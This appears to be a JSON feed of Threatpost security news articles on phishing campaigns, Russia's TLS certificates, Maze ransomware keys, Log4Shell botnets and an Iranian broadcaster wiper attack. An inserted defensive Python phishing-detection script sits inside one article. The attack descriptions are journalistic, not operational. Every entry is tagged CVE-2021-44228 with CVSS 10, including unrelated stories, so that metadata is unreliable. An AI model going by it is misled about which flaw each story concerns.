That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? 
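The tells just described (a display name that reads as the brand only because of a lookalike letter, a consumer-webmail domain standing in for the brand's, and deadline language in the body) can be turned into a scorer that runs over the From: header and the body. The script below is an added example, not Armorblox's detection logic; the brand-to-domain map, the free-mail list, the confusable-character map and the two sample messages are constructed, with the phishing sample modeled on the sender and wording the article describes.

```python
"""Score a From: header and body for the impersonation tells described above.

Added example, not Armorblox's detection logic. The brand/domain map, the
confusable-character map and the sample messages are constructed here.
Standard library only.
"""
import re
from email.utils import parseaddr
from typing import Dict, List, Set

# Brands we expect mail from, and the sending domains accepted for them (assumed).
BRAND_DOMAINS: Dict[str, Set[str]] = {
    "instagram": {"instagram.com", "mail.instagram.com"},
    "docusign": {"docusign.com", "docusign.net"},
}
# Consumer webmail domains a brand's support team would never send from.
FREEMAIL_DOMAINS: Set[str] = {
    "outlook.com", "outlook.com.tr", "hotmail.com", "gmail.com", "yahoo.com"}
# Characters that pass for another letter in a mail client's sender field.
CONFUSABLES = str.maketrans({"l": "i", "1": "i", "|": "i", "0": "o", "3": "e", "5": "s"})
URGENCY = re.compile(
    r"\b(within \d+ hours?|permanently (deleted|suspended)|immediately|verify (your|now))\b",
    re.I)


def fold(text: str) -> str:
    """Lower-case and collapse confusable characters onto the letter they imitate."""
    return text.lower().translate(CONFUSABLES)


def score_message(from_header: str, body: str) -> List[str]:
    """Return the tells found, in a fixed order; an empty list means nothing fired."""
    findings: List[str] = []
    display, address = parseaddr(from_header)
    domain = address.rpartition("@")[2].lower()
    display_lc, display_folded = display.lower(), fold(display)

    for brand, good_domains in BRAND_DOMAINS.items():
        names_brand = fold(brand) in display_folded
        # The brand is spelled only after folding: "lnstagram" reads as "Instagram".
        if names_brand and brand not in display_lc:
            findings.append(f"homoglyph_display_name:{brand}")
        # Display name or domain claims the brand, but the domain is not the brand's.
        if (names_brand or brand in domain) and domain not in good_domains:
            findings.append(f"brand_domain_mismatch:{brand}")
    if domain in FREEMAIL_DOMAINS:
        findings.append("freemail_sender")
    if URGENCY.search(body):
        findings.append("urgency_language")
    return findings


# Constructed samples; the first mirrors the sender and wording the article describes.
PHISH_FROM = "lnstagram Support <membershipform@outlook.com.tr>"
PHISH_BODY = ("You have been reported for sharing fake content in your membership. "
              "You must verify your membership. If you can't verify within 24 hours "
              "your membership will be permanently deleted from our servers.")
LEGIT_FROM = "Instagram <no-reply@mail.instagram.com>"
LEGIT_BODY = "Here is your weekly account summary."

if __name__ == "__main__":
    for label, hdr, body in (("phish", PHISH_FROM, PHISH_BODY),
                             ("legit", LEGIT_FROM, LEGIT_BODY)):
        print(label, score_message(hdr, body) or "clean")
```

The folding step is the part that matters: a plain substring match for "instagram" never fires on "lnstagram Support", which is exactly why the lookalike letter got past readers. A production filter would add the SPF, DKIM and DMARC results from the Authentication-Results header, since a valid free-mail domain will pass all three and still be a phish.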
Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing:\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. \u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, and then across other organizations along its supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by 
foreign certificate authorities. A pile of sanctions imposed in the wake of Russia\u2019s invasion of Ukraine is gumming up its citizens\u2019 access to websites: Russian sites are stuck, unable to renew their certs because sanctions leave signing authorities in many countries unable to accept payments from Russia, according to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).\n\nTLS \u2013 still widely called SSL, or TLS/SSL \u2013 is the cryptographic protocol that encrypts data sent between your browser and the server of the website you visit, keeping it private and protected from tampering, as DigiCert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>). The certificate is what ties that encrypted session to a real identity: it binds the site\u2019s public key to its domain name and carries the signature of a certificate authority (CA) the browser already trusts, so the browser can tell the genuine site from an impostor holding a different key. Without that check, encryption alone would not stop a man in the middle.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)\n\nHow TLS certificates work. Source: Digicert.\n\nAccording to a [notice](<https://www.gosuslugi.ru/tls>) on Russia\u2019s public service portal, Gosuslugi, as shown in a translated version in this article\u2019s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.\n\n## The \u2018Digital Iron Curtain\u2019\n\nOver the past two weeks, Russia\u2019s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. 
internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country\u2019s citizens behind what some analysts are calling \u201ca new digital Iron Curtain.\u201d\n\nMikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he\u2019s \u201cvery afraid of this.\u201d\n\n\u201cI would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet \u2014 all people in Russia will only listen to propaganda.\u201d\n\n## Chrome, Firefox, Edge Won\u2019t Swallow the New Certs\n\nBleepingComputer reported on Thursday that the only web browsers recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products, which are Russian users\u2019 only alternative to browsers such as Chrome, Firefox, Edge and others.\n\nSomeone with a Mozilla domain email address on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new Russian root cert, pointing to the possibility of the Russian government using it to mount man-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) \u2013 though, they said, none had been detected as of yesterday. The concern follows from how browser trust works: a root CA in a user\u2019s trust store can sign a certificate for any domain, so whoever holds that root\u2019s private key can impersonate any site to that user without the browser raising a warning.\n\n\u201cAlthough at present there\u2019s no MitM, it\u2019s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,\u201d they said. 
They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate \u201cworth urgent consideration.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-11T16:14:34", "description": "The shackles have been broken for victims of 
Maze/Egregor/Sekhmet ransomware: On Wednesday, decryption keys were released for all three ransomware strains in a [forum post](<https://www.bleepingcomputer.com/forums/t/768330/leak-maze-egregor-sekhmet-keys-along-with-m0yv-expiro-source-code/>).\n\nThe liberator, using the handle \u201cTopleak,\u201d described themselves as the developer of the three ransomwares.\n\nIt\u2019s been lovely, but now it\u2019s time to say bye-bye, Topleak said: \u201cNeither of our team member will never return to this kind of activity, it was pleasant to work with you. All source code of tools ever made is wiped out.\u201d\n\nTranslation: Maze team members are purportedly never going back to ransomware, and they\u2019ve destroyed all of their ransomware source code. In the post, Topleak included a .ZIP file containing decryption keys for the ransomware, along with some of the Maze gang\u2019s malware source code. The .ZIP file was subsequently removed from the post, due to the fact that it included that source code.\n\nThe original keys aren\u2019t necessary, though: After confirming that those decryption keys are legitimate, Emsisoft [released a decryptor](<https://www.emsisoft.com/ransomware-decryption-tools/maze-sekhmet-egregor>) that will enable any Maze, Egregor and Sekhmet victims to recover their files for free.\n\n## Innovators of the Double Whammy\n\nMaze, once considered one of the most active ransomware gangs out there, was a pioneer in the dark art of [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>): i.e., not only snarling a target\u2019s files in a ransomware attack, but also threatening to make the encrypted data publicly available if the victim doesn\u2019t pay up.\n\nThe gang first bubbled up in November 2019, going on to score big hits against the likes of [Cognizant](<https://threatpost.com/maze-ransomware-cognizant/154957/>) and 
[Xerox](<https://www.crn.com/news/security/xerox-files-allegedly-stolen-by-maze-ransomware-group-reports>).\n\nThen, in summer 2020, Maze formed a cybercrime cartel, joining forces with various ransomware strains, including [Egregor](<https://threatpost.com/egregor-ransomware-mass-media-corporate-data/159816/>), to [share code, ideas and resources](<https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/>).\n\nSome experts considered Egregor to be a [reincarnation](<https://www.zdnet.com/article/egregor-ransomware-operators-arrested-in-ukraine/>) of Maze. For its part, Appgate [judged](<https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor>) Egregor\u2019s code to be a spinoff of the[ Sekhmet ransomware](<https://www.itwire.com/security/criminals-use-sekhmet-ransomware-to-hit-gas-company-silpac-twice.html>) \u2013 a link that was[ also noted](<https://twitter.com/demonslay335/status/1307056098596335628>) by other researchers.\n\nMaze [announced](<https://grahamcluley.com/maze-ransomware-gang-closes/>) it was [shutting down](<https://www.computerweekly.com/news/252491480/Maze-ransomware-shuts-down-with-bizarre-announcement>) in November 2020, posting a self-righteous screed in which it explained that the \u201cproject\u201d had been set up because the world is \u201csinking into recklessness and indifference, in laziness and stupidity.\u201d\n\nIts year-long cybercrime spree was all about demonstrating their targeted organizations\u2019 lax cybersecurity hygiene, according to its press release \u2013 as if a ransomware attack is the cyber-equivalent of, say, a colon cleanse.\n\n## Maze: We\u2019re For Reals\n\nIt\u2019s not uncommon for cyber-gangs to announce their retirement and then yo-yo back into business, turning up for other cybercrime projects.\n\nOne example is GandCrab, the ransomware-as-a-service (RaaS) outfit that announced in June 2019 that it was going to [kick 
back](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>) and enjoy the $2 billion it had made in a year-long feeding frenzy\u2026only to jump out of its rocking chair a few months later, with code analysis [linking](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>) the authors to REvil/Sodinokibi ransomware.\n\nAnother example is [BlackMatter](<https://threatpost.com/blackmatter-ransomware-dark/175955/>), considered a [rebirth](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>) of at least some of the lower-level REvil and BackMatter players, which announced it would shut down \u2013 again \u2013 in November following pressure from local authorities. DarkSide\u2019s shutdown, coming a few weeks after the RaaS gang [crippled Colonial Pipeline Co.](<https://threatpost.com/pipeline-crippled-ransomware/165963/>), also happened after [it got raided by authorities](<https://threatpost.com/darksides-servers-shutdown/166187/>).\n\nThe Maze gang could follow the same path, turning their supposed retirement into an opportunity to move on to new projects. Topleak addressed the haziness and chatter that typically surround \u201cgoing out of business\u201d announcements, writing in their announcement that the gang isn\u2019t being forced out of the ransomware business:\n\n\u201cSince it will raise too much clues and most of them will be false, it is necessary to emphasize that it is planned leak, and have no any connections to recent arrests and takedowns,\u201d Topleak said.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T23:16:44", "type": "threatpost", "title": "Decryptor Keys Published for Maze, Egregor, Sekhmet Ransomwares", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T23:16:44", "id": "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "href": "https://threatpost.com/decryptor-keys-maze-egregor-sekhmet-ransomwares/178363/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution 
(RCE) flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability**\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanism, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell**\n\nThe other Linux botnet launched to take advantage of the Apache Log4j library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, 
knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks**\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 in less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": 
"https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:48", "description": "Threat actors have new targets in their sights this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.\n\nIt\u2019s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that\u2019s traditionally rife with scams. In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.\n\nThis year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) \u201cto steal credentials and give users a false sense of security that they\u2019ve compiled the right tax documents,\u201d according to [a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.\n\nIn scams observed by Avanan researchers beginning in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.\n\nThe email includes a link to a document \u2013 purportedly associated with the person\u2019s Stash or Public account \u2013 and invites users to use the link to log in to their accounts to 
access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.\n\n## **Rise in Fintech Threats**\n\nFintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people\u2019s overall time online.\n\nAccording to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 \u2013 a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.\n\nSurprisingly, that\u2019s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. \u201cThat gives hackers a wide range of people to steal credentials from,\u201d he said.\n\nThreat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year\u2019s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.\n\n## **Catching Users Off Guard**\n\nFintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.\n\n\u201cThey may not be expecting tax documents from these apps, inducing them to click,\u201d he wrote in the report. 
\u201cSince most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber hygiene.\u201d\n\nOn the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.\n\nTo keep networks safe during tax season, Avanan is advising security professionals to encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company\u2019s IT department if they are unsure whether an email is legitimate.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:16", "type": "threatpost", "title": "Tax-Season Scammers Spoof Fintechs, Including Stash, Public", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:16", "id": "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "href": "https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:47", "description": "Footage of opposition leaders calling for the assassination of Iran\u2019s Supreme Leader ran on several of the nation\u2019s state-run TV channels in late January after a state-sponsored cyber-attack on Iranian state broadcaster IRIB.\n\nThe incident \u2013 one of a series of politically motivated attacks in Iran that have occurred in the last year \u2013 included the use of a wiper that potentially ties it to a previous high-profile attack on Iran\u2019s national transportation networks in July, according to researchers from Check Point Research.\n\nHowever, though the earlier attacks have been attributed to [Iran state-sponsored actor Indra](<https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/>), researchers believe a copycat actor was behind the IRIB attack based on the malware and tools used in the attack, they said in a [report](<https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/>) published Friday.\n\n\u201cAmong the tools used in the attack, we identified malware that takes screenshots of the victims\u2019 screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables,\u201d 
researchers wrote in the report. \u201cWe could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.\u201d\n\nThe disruptive attack on IRIB occurred on Jan. 27, with attackers showing a savviness and knowledge of how to infiltrate systems that suggest it may also have been an inside job, researchers said.\n\nThe attack managed to bypass security systems and network segmentation, penetrate the broadcaster\u2019s networks, and produce and run the malicious tools that relied on internal knowledge of the broadcasting software used by victims, \u201call while staying under the radar during the reconnaissance and initial intrusion stages,\u201d they noted.\n\nIndeed, nearly two weeks after the attack happened, a news outlet affiliated with opposition party MEK [published](<https://english.mojahedin.org/news/iran-despite-utilizing-all-resources-after-12-days-regimes-radio-and-tv-networks-have-not-returned-to-a-normal-status/>) a status report of the attack claiming that state-sponsored radio and TV networks still had not returned to normal, and that more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, according to the report.\n\n## **Spate of Attacks**\n\nIran\u2019s national infrastructure has been the victim of a wave of attacks aimed at causing serious disruption and damage. Two incidents that targeted national transportation infrastructure occurred on two consecutive days in July.\n\nOne was a [rail-transportation incident](<https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/>) \u2013 which disrupted rail service and also taunted Iran\u2019s Supreme Leader Ayatollah Sayyid Ali Hosseini Khamenei via hacked public transit display screens. 
A day later, Iran\u2019s Ministry of Roads and Urban Development also [was hit with a cyber-attack](<https://www.reuters.com/world/middle-east/iran-transport-ministry-hit-by-second-apparent-cyberattack-days-2021-07-10/>) that took down employees\u2019 computer systems.\n\nThen in October, an attack on Iran\u2019s fuel-distribution network [stranded drivers](<https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/>) at fuel pumps across the country by disabling government-issued electronic cards providing subsidies that many Iranians use to purchase fuel at discounted prices.\n\nCheck Point researchers analyzed tools in the IRIB cyber-attack and compared them with those of Indra, the group believed to be responsible for the previous attacks in Iran\u2019s infrastructure. Specifically, a novel wiper called Meteor \u2013 which not only wipes files but also can change users\u2019 passwords, disable screensavers, terminate processes and disable recovery mode, among other nefarious features \u2013 was used in both the railway and roads attacks.\n\nHowever, though a wiper was used against IRIB, it doesn\u2019t appear to be the same one. Nor are the threat actors behind it likely the same, though a copycat situation may be at play, researchers concluded.\n\n\u201cAlthough these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra\u2019s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks [that] happened in Iran,\u201d they wrote in the report.\n\n## **Claiming Responsibility**\n\nIt\u2019s still unclear who, exactly, the perpetrators of the IRIB attack are, however. 
